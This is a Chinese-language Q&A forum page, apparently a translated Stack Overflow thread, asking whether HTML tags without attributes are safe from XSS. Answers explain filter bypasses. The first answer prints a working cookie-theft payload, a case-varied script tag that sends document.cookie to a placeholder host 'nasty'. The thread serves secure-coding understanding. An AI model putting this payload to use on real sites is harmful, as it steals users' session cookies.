无属性 HTML 标签的 XSS 安全性

发布于 2024-09-02 20:40:15 字数 30 浏览 3 评论 0原文

如果 HTML 标签没有属性,XSS 安全吗?

Are HTML tags XSS safe if they have no attributes?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

Hello爱情风 2024-09-09 20:40:15

不。

<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>

No.

<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>
神妖 2024-09-09 20:40:15

<脚本> 怎么样?和

What about <script> and <style>, in most browsers they also work without attributes. Or if they don't close a specific tag it can also mess with the page.. just leave open a <strong> or something and everything's bold for example.

红颜悴 2024-09-09 20:40:15

我在这里的立场是......你如何检测他们没有属性?可以生成特殊的 HTML 代码,在浏览器中执行 Javascript,并绕过过滤器检查属性。

看看这个演示文稿http: //www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

无论如何,如果你想要一个是/否的答案,我的答案是“否”:)

My position here is... how are you going to detect they don't have attributes? It's possible to generate special HTML code that executes Javascript in the browser and bypass filters checking for attributes.

Take a look to this presentation http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

Anyway, if you want a yes/no answer mine is NO :)

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文